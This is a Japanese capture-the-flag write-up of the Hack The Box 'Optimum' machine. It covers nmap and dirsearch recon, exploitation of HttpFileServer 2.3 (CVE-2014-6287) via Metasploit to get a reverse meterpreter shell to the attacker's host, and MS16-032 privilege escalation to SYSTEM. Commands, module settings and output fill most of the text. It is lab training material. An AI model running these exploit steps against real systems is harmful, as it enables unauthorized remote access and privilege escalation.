まえがき
この記事はOptimumのWriteupになっています📝
ダブルピースおじさんを攻略していきます。
Machine Info
Name: Optimum
IP Adress: 10.10.10.8
OS: Windows 🪟
Recon
Port Scan - Nmap
┌──(root㉿kali)-[/home/kali/Desktop/work]
└─# nmap 10.10.10.8 -Pn -v -A
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-02 00:23 JST
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 00:23
Completed NSE at 00:23, 0.00s elapsed
Initiating NSE at 00:23
Completed NSE at 00:23, 0.00s elapsed
Initiating NSE at 00:23
Completed NSE at 00:23, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 00:23
Completed Parallel DNS resolution of 1 host. at 00:23, 0.08s elapsed
Initiating SYN Stealth Scan at 00:23
Scanning 10.10.10.8 [1000 ports]
Discovered open port 80/tcp on 10.10.10.8
Completed SYN Stealth Scan at 00:23, 23.47s elapsed (1000 total ports)
Initiating Service scan at 00:23
Scanning 1 service on 10.10.10.8
Completed Service scan at 00:24, 6.76s elapsed (1 service on 1 host)
Initiating OS detection (try #1) against 10.10.10.8
Retrying OS detection (try #2) against 10.10.10.8
Initiating Traceroute at 00:24
Completed Traceroute at 00:24, 0.61s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 00:24
Completed Parallel DNS resolution of 2 hosts. at 00:24, 0.03s elapsed
NSE: Script scanning 10.10.10.8.
Initiating NSE at 00:24
Completed NSE at 00:24, 7.16s elapsed
Initiating NSE at 00:24
Completed NSE at 00:24, 1.38s elapsed
Initiating NSE at 00:24
Completed NSE at 00:24, 0.00s elapsed
Nmap scan report for 10.10.10.8
Host is up (0.44s latency).
Not shown: 999 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http HttpFileServer httpd 2.3
|_http-title: HFS /
| http-methods:
|_ Supported Methods: GET HEAD POST
|_http-favicon: Unknown favicon MD5: 759792EDD4EF8E6BC2D1877D27153CB1
|_http-server-header: HFS 2.3
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone|specialized
Running (JUST GUESSING): Microsoft Windows 2012|8|Phone|7 (89%)
OS CPE: cpe:/o:microsoft:windows_server_2012 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_7
Aggressive OS guesses: Microsoft Windows Server 2012 (89%), Microsoft Windows Server 2012 or Windows Server 2012 R2 (89%), Microsoft Windows Server 2012 R2 (89%), Microsoft Windows 8.1 Update 1 (86%), Microsoft Windows Phone 7.5 or 8.0 (86%), Microsoft Windows Embedded Standard 7 (85%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 0.273 days (since Mon Jan 1 17:50:41 2024)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=259 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 597.19 ms 10.10.14.1
2 597.21 ms 10.10.10.8
NSE: Script Post-scanning.
Initiating NSE at 00:24
Completed NSE at 00:24, 0.00s elapsed
Initiating NSE at 00:24
Completed NSE at 00:24, 0.00s elapsed
Initiating NSE at 00:24
Completed NSE at 00:24, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 47.66 seconds
Raw packets sent: 2094 (95.844KB) | Rcvd: 56 (3.272KB)
80番のポートのみ開いていることがわかる。
Site - http://10.10.10.8
実際にアクセスしてみるとこんなページが見つかる。
Loginをクリックすると認証が求められる。
homeやその他のボタンも試してみるが、とりあえずは何もなさそう。
Enumeration
他に見落としがないか確認していく。
dirsearch
┌──(root㉿kali)-[/home/kali/Desktop/work]
└─# dirsearch -u http://10.10.10.8
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /home/kali/Desktop/work/reports/http_10.10.10.8/_24-01-02_00-34-22.txt
Target: http://10.10.10.8/
[00:34:22] Starting:
[00:37:10] 200 - 576B - /favicon.ico
Task Completed
あまり注目すべき階層はなかったようだ。
Login部分もBurpを立ち上げ検証をしてみたが、今のところ有益な情報は手に入らなかったため、違うアプローチをしていくことにする。
Server Infomationのセクションをみてみると、HttpFileServer 2.3が使用されていることが分かる。これについて詳しく調査していこう。
Identification of Vulnerbility
CVE-2014-6287
Http File Server 2.3 Vulnで調べると、Remote Command Executionの脆弱性が発見できる。悪用していこう。
Exploit the Vulnerbility
github
良さげなコードを見つけた。ためしてみる。
┌──(root㉿kali)-[/home/kali/Desktop/work/Rejetto-HTTP-File-Server-HFS-2.3.x---Remote-Command-Execution]
└─# python3 hfs-2-3-exploit.py
Local Host IP : 10.10.14.4
Listen Port : 4444
Remote Host IP : 10.10.10.8
HTTP FileServer Port: 80
[+] Checking URL Is HTTP FileServer 2.3...
[+] Target is online and appears to be HttpFileServer 2.3
[+} Building Exploit
[+] Do you want me to start a Netcat Listener for you? (Y/n): Y
[+] Sending Exploit
[+] Starting Netcat on Port: 4444
!!!! --- Press Enter After Connection Established --- !!!!
listening on [any] 4444 ...
connect to [10.10.14.4] from (UNKNOWN) [10.10.10.8] 49169
^C
少し待機してみたが、うまくいかなかったため断念。
metasploit
┌──(root㉿kali)-[/home/kali/Desktop/work]
└─# msfconsole
Metasploit tip: You can pivot connections over sessions started with the
ssh_login modules
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMM MMMMMMMMMM
MMMN$ vMMMM
MMMNl MMMMM MMMMM JMMMM
MMMNl MMMMMMMN NMMMMMMM JMMMM
MMMNl MMMMMMMMMNmmmNMMMMMMMMM JMMMM
MMMNI MMMMMMMMMMMMMMMMMMMMMMM jMMMM
MMMNI MMMMMMMMMMMMMMMMMMMMMMM jMMMM
MMMNI MMMMM MMMMMMM MMMMM jMMMM
MMMNI MMMMM MMMMMMM MMMMM jMMMM
MMMNI MMMNM MMMMMMM MMMMM jMMMM
MMMNI WMMMM MMMMMMM MMMM# JMMMM
MMMMR ?MMNM MMMMM .dMMMM
MMMMNm `?MMM MMMM` dMMMMM
MMMMMMN ?MM MM? NMMMMMN
MMMMMMMMNe JMMMMMNMMM
MMMMMMMMMMNm, eMMMMMNMMNMM
MMMMNNMNMMMMMNx MMMMMMNMMNMMNM
MMMMMMMMNMMNMMMMm+..+MMNMMNMNMMNMMNMM
https://metasploit.com
=[ metasploit v6.3.43-dev ]
+ -- --=[ 2376 exploits - 1232 auxiliary - 416 post ]
+ -- --=[ 1388 payloads - 46 encoders - 11 nops ]
+ -- --=[ 9 evasion ]
Metasploit Documentation: https://docs.metasploit.com/
msf6 > search CVE-2014-6287
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/http/rejetto_hfs_exec 2014-09-11 excellent Yes Rejetto HttpFileServer Remote Command Execution
Exploitが1つだけ見つかった。使っていこう。
msf6 > use 0
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
show optionsで設定を確認しつつ、必要部分を設定していこう。
msf6 exploit(windows/http/rejetto_hfs_exec) > show options
Module options (exploit/windows/http/rejetto_hfs_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
HTTPDELAY 10 no Seconds to wait before terminating web server
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 80 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to liste
n on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TARGETURI / yes The path of the web application
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.236.128 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
View the full module info with the info, or info -d command.
LHOST部分とRHOSTS部分が必要っぽい。
msf6 exploit(windows/http/rejetto_hfs_exec) > set LHOST 10.10.14.4
LHOST => 10.10.14.4
msf6 exploit(windows/http/rejetto_hfs_exec) > set RHOST 10.10.10.8
RHOST => 10.10.10.8
msf6 exploit(windows/http/rejetto_hfs_exec) > show options
Module options (exploit/windows/http/rejetto_hfs_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
HTTPDELAY 10 no Seconds to wait before terminating web server
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 10.10.10.8 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 80 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to liste
n on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TARGETURI / yes The path of the web application
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.10.14.4 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
View the full module info with the info, or info -d command.
設定完了。実行しよう。
msf6 exploit(windows/http/rejetto_hfs_exec) > exploit
[*] Started reverse TCP handler on 10.10.14.4:4444
[*] Using URL: http://10.10.14.4:8080/px8cI3cT
[*] Server started.
[*] Sending a malicious request to /
[*] Payload request received: /px8cI3cT
[*] Sending stage (175686 bytes) to 10.10.10.8
[!] Tried to delete %TEMP%\LKpMxyyxCUCw.vbs, unknown result
[*] Meterpreter session 1 opened (10.10.14.4:4444 -> 10.10.10.8:49162) at 2024-01-01 23:21:44 +0900
[*] Server stopped.
meterpreter >
shellがとれたようだ。
meterpreter > shell
Process 1896 created.
Channel 2 created.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\Users\kostas\Desktop>whoami
whoami
optimum\kostas
Analysis & Recon
探ってみる。user.txtが見つかる。
C:\Users\kostas\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is EE82-226D
Directory of C:\Users\kostas\Desktop
08/01/2024 01:19 �� <DIR> .
08/01/2024 01:19 �� <DIR> ..
08/01/2024 01:19 �� <DIR> %TEMP%
18/03/2017 02:11 �� 760.320 hfs.exe
07/01/2024 07:49 �� 34 user.txt
2 File(s) 760.354 bytes
3 Dir(s) 5.673.996.288 bytes free
C:\Users\kostas\Desktop>cat user.txt
cat user.txt
'cat' is not recognized as an internal or external command,
operable program or batch file.
C:\Users\kostas\Desktop>type user.txt
type user.txt
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX //32文字のUserFlag
いつものようにcatコマンドを使用してしまったが、Windowsマシンであることを忘れずに。今回はtypeで出力しよう。
Privilege Escalation
root.txtを見るためには、権限昇格をする必要がある。
backgroundにしてから、Multi Recon Local Exploit Suggesterを使って脆弱性を探索していこう。
meterpreter > background
[*] Backgrounding session 2...
msf6 exploit(windows/http/rejetto_hfs_exec) > search suggester
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 post/multi/recon/local_exploit_suggester normal No Multi Recon Local Exploit Suggester
Interact with a module by name or index. For example info 0, use 0 or use post/multi/recon/local_exploit_suggester
msf6 exploit(windows/http/rejetto_hfs_exec) > use 0
show optionsで設定確認。
msf6 post(multi/recon/local_exploit_suggester) > show options
Module options (post/multi/recon/local_exploit_suggester):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on
SHOWDESCRIPTION false yes Displays a detailed description for the available exploits
View the full module info with the info, or info -d command.
SESSIONを設定していく。
msf6 post(multi/recon/local_exploit_suggester) > set SESSION 2
SESSION => 2
msf6 post(multi/recon/local_exploit_suggester) > show options
Module options (post/multi/recon/local_exploit_suggester):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION 2 yes The session to run this module on
SHOWDESCRIPTION false yes Displays a detailed description for the available exploits
View the full module info with the info, or info -d command.
設定完了。実行しよう。
msf6 post(multi/recon/local_exploit_suggester) > exploit
[*] 10.10.10.8 - Collecting local exploits for x86/windows...
[*] 10.10.10.8 - 188 exploit checks are being tried...
[+] 10.10.10.8 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
[+] 10.10.10.8 - exploit/windows/local/bypassuac_sluihijack: The target appears to be vulnerable.
[+] 10.10.10.8 - exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move: The service is running, but could not be validated. Vulnerable Windows 8.1/Windows Server 2012 R2 build detected!
[+] 10.10.10.8 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The service is running, but could not be validated.
[+] 10.10.10.8 - exploit/windows/local/tokenmagic: The target appears to be vulnerable.
[*] Running check method for exploit 41 / 41
[*] 10.10.10.8 - Valid modules for session 2:
============================
# Name Potentially Vulnerable? Check Result
- ---- ----------------------- ------------
1 exploit/windows/local/bypassuac_eventvwr Yes The target appears to be vulnerable.
2 exploit/windows/local/bypassuac_sluihijack Yes The target appears to be vulnerable.
3 exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move Yes The service is running, but could not be validated. Vulnerable Windows 8.1/Windows Server 2012 R2 build detected!
4 exploit/windows/local/ms16_032_secondary_logon_handle_privesc Yes The service is running, but could not be validated.
5 exploit/windows/local/tokenmagic Yes The target appears to be vulnerable.
6 exploit/windows/local/adobe_sandbox_adobecollabsync No Cannot reliably check exploitability.
7 exploit/windows/local/agnitum_outpost_acs No The target is not exploitable.
8 exploit/windows/local/always_install_elevated No The target is not exploitable.
9 exploit/windows/local/anyconnect_lpe No The target is not exploitable. vpndownloader.exe not found on file system
10 exploit/windows/local/bits_ntlm_token_impersonation No The target is not exploitable.
11 exploit/windows/local/bthpan No The target is not exploitable.
12 exploit/windows/local/bypassuac_fodhelper No The target is not exploitable.
13 exploit/windows/local/canon_driver_privesc No The target is not exploitable. No Canon TR150 driver directory found
14 exploit/windows/local/cve_2020_1048_printerdemon No The target is not exploitable.
15 exploit/windows/local/cve_2020_1337_printerdemon No The target is not exploitable.
16 exploit/windows/local/gog_galaxyclientservice_privesc No The target is not exploitable. Galaxy Client Service not found
17 exploit/windows/local/ikeext_service No The check raised an exception.
18 exploit/windows/local/ipass_launch_app No The check raised an exception.
19 exploit/windows/local/lenovo_systemupdate No The check raised an exception.
20 exploit/windows/local/lexmark_driver_privesc No The check raised an exception.
21 exploit/windows/local/mqac_write No The target is not exploitable.
22 exploit/windows/local/ms10_015_kitrap0d No The target is not exploitable.
23 exploit/windows/local/ms10_092_schelevator No The target is not exploitable. Windows 2012 R2 (6.3 Build 9600). is not vulnerable
24 exploit/windows/local/ms13_053_schlamperei No The target is not exploitable.
25 exploit/windows/local/ms13_081_track_popup_menu No Cannot reliably check exploitability.
26 exploit/windows/local/ms14_058_track_popup_menu No The target is not exploitable.
27 exploit/windows/local/ms14_070_tcpip_ioctl No The target is not exploitable.
28 exploit/windows/local/ms15_004_tswbproxy No The target is not exploitable.
29 exploit/windows/local/ms15_051_client_copy_image No The target is not exploitable.
30 exploit/windows/local/ms16_016_webdav No The target is not exploitable.
31 exploit/windows/local/ms16_075_reflection No The target is not exploitable.
32 exploit/windows/local/ms16_075_reflection_juicy No The target is not exploitable.
33 exploit/windows/local/ms_ndproxy No The target is not exploitable.
34 exploit/windows/local/novell_client_nicm No The target is not exploitable.
35 exploit/windows/local/ntapphelpcachecontrol No The check raised an exception.
36 exploit/windows/local/ntusermndragover No The target is not exploitable.
37 exploit/windows/local/panda_psevents No The target is not exploitable.
38 exploit/windows/local/ppr_flatten_rec No The target is not exploitable.
39 exploit/windows/local/ricoh_driver_privesc No The target is not exploitable. No Ricoh driver directory found
40 exploit/windows/local/virtual_box_guest_additions No The target is not exploitable.
41 exploit/windows/local/webexec No The check raised an exception.
[*] Post module execution completed
上5つが有効な可能性があるエクスプロイトだ。1つずつ試していった結果、4つめが使えた。
設定は先ほどのようにやっていく。
[*] Post module execution completed
msf6 post(multi/recon/local_exploit_suggester) > use exploit/windows/local/ms16_032_secondary_logon_handle_privesc
[*] Using configured payload windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > show options
Module options (exploit/windows/local/ms16_032_secondary_logon_handle_privesc):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.236.128 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows x86
View the full module info with the info, or info -d command.
msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > set lhost 10.10.14.4
lhost => 10.10.14.4
msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > set session 2
session => 2
msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > show options
Module options (exploit/windows/local/ms16_032_secondary_logon_handle_privesc):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION 2 yes The session to run this module on
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.10.14.4 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows x86
View the full module info with the info, or info -d command.
実行。
msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > run
[*] Started reverse TCP handler on 10.10.14.4:4444
[+] Compressed size: 1160
[!] Executing 32-bit payload on 64-bit ARCH, using SYSWOW64 powershell
[*] Writing payload file, C:\Users\kostas\AppData\Local\Temp\BcgFSuoEtx.ps1...
[*] Compressing script contents...
[+] Compressed size: 3743
[*] Executing exploit script...
__ __ ___ ___ ___ ___ ___ ___
| V | _|_ | | _|___| |_ |_ |
| |_ |_| |_| . |___| | |_ | _|
|_|_|_|___|_____|___| |___|___|___|
[by b33f -> @FuzzySec]
[?] Operating system core count: 2
[>] Duplicating CreateProcessWithLogonW handle
[?] Done, using thread handle: 1220
[*] Sniffing out privileged impersonation token..
[?] Thread belongs to: svchost
[+] Thread suspended
[>] Wiping current impersonation token
[>] Building SYSTEM impersonation token
[ref] cannot be applied to a variable that does not exist.
At line:200 char:3
+ $qAz = [Ntdll]::NtImpersonateThread($wM6, $wM6, [ref]$b_AQ)
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : InvalidOperation: (b_AQ:VariablePath) [], Runtim
eException
+ FullyQualifiedErrorId : NonExistingVariableReference
[!] NtImpersonateThread failed, exiting..
[+] Thread resumed!
[*] Sniffing out SYSTEM shell..
[>] Duplicating SYSTEM token
Cannot convert argument "ExistingTokenHandle", with value: "", for "DuplicateTo
ken" to type "System.IntPtr": "Cannot convert null to type "System.IntPtr"."
At line:259 char:2
+ $qAz = [Advapi32]::DuplicateToken($rJG, 2, [ref]$ftoaU)
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], MethodException
+ FullyQualifiedErrorId : MethodArgumentConversionInvalidCastArgument
[>] Starting token race
[>] Starting process race
[!] Holy handle leak Batman, we have a SYSTEM shell!!
KHPgiZYP84alGvOsQ1GzdNieqyEW7ItF
[+] Executed on target machine.
[*] Sending stage (175686 bytes) to 10.10.10.8
[*] Meterpreter session 3 opened (10.10.14.4:4444 -> 10.10.10.8:49168) at 2024-01-02 00:03:47 +0900
[+] Deleted C:\Users\kostas\AppData\Local\Temp\BcgFSuoEtx.ps1
meterpreter >
権限昇格もうまくいったようだ。
meterpreter > shell
Process 336 created.
Channel 1 created.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\Users\kostas\Desktop>cd /
cd /
C:\>dir
dir
Volume in drive C has no label.
Volume Serial Number is EE82-226D
Directory of C:\
22/08/2013 05:52 �� <DIR> PerfLogs
31/12/2017 06:14 �� <DIR> Program Files
22/08/2013 05:39 �� <DIR> Program Files (x86)
18/03/2017 01:57 �� <DIR> Users
18/03/2017 01:53 �� <DIR> Windows
0 File(s) 0 bytes
5 Dir(s) 5.686.956.032 bytes free
C:\>cd Users
cd Users
C:\Users>dir
dir
Volume in drive C has no label.
Volume Serial Number is EE82-226D
Directory of C:\Users
18/03/2017 01:57 �� <DIR> .
18/03/2017 01:57 �� <DIR> ..
18/03/2017 01:52 �� <DIR> Administrator
18/03/2017 01:57 �� <DIR> kostas
22/08/2013 05:39 �� <DIR> Public
0 File(s) 0 bytes
5 Dir(s) 5.686.956.032 bytes free
Administratorがある。移動してみよう。
C:\Users>cd Administrator
cd Administrator
C:\Users\Administrator>dir
dir
Volume in drive C has no label.
Volume Serial Number is EE82-226D
Directory of C:\Users\Administrator
18/03/2017 01:52 �� <DIR> .
18/03/2017 01:52 �� <DIR> ..
18/03/2017 01:52 �� <DIR> Contacts
18/03/2017 02:14 �� <DIR> Desktop
18/03/2017 01:52 �� <DIR> Documents
18/03/2017 01:52 �� <DIR> Downloads
18/03/2017 01:52 �� <DIR> Favorites
18/03/2017 01:52 �� <DIR> Links
18/03/2017 01:52 �� <DIR> Music
18/03/2017 01:52 �� <DIR> Pictures
18/03/2017 01:52 �� <DIR> Saved Games
18/03/2017 01:52 �� <DIR> Searches
18/03/2017 01:52 �� <DIR> Videos
0 File(s) 0 bytes
13 Dir(s) 5.686.956.032 bytes free
C:\Users\Administrator>cd Desktop
cd Desktop
C:\Users\Administrator\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is EE82-226D
Directory of C:\Users\Administrator\Desktop
18/03/2017 02:14 �� <DIR> .
18/03/2017 02:14 �� <DIR> ..
07/01/2024 07:49 �� 34 root.txt
1 File(s) 34 bytes
2 Dir(s) 5.686.956.032 bytes free
C:\Users\Administrator\Desktop>type root.txt
type root.txt
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX //32文字のRootFlag
RootFlagGet。
あとがき
かなり簡単なマシンでした。Metasploitの練習や復習には良いかもですね。今回のマシンアイコンのダブルピースおじさんなんか好き。
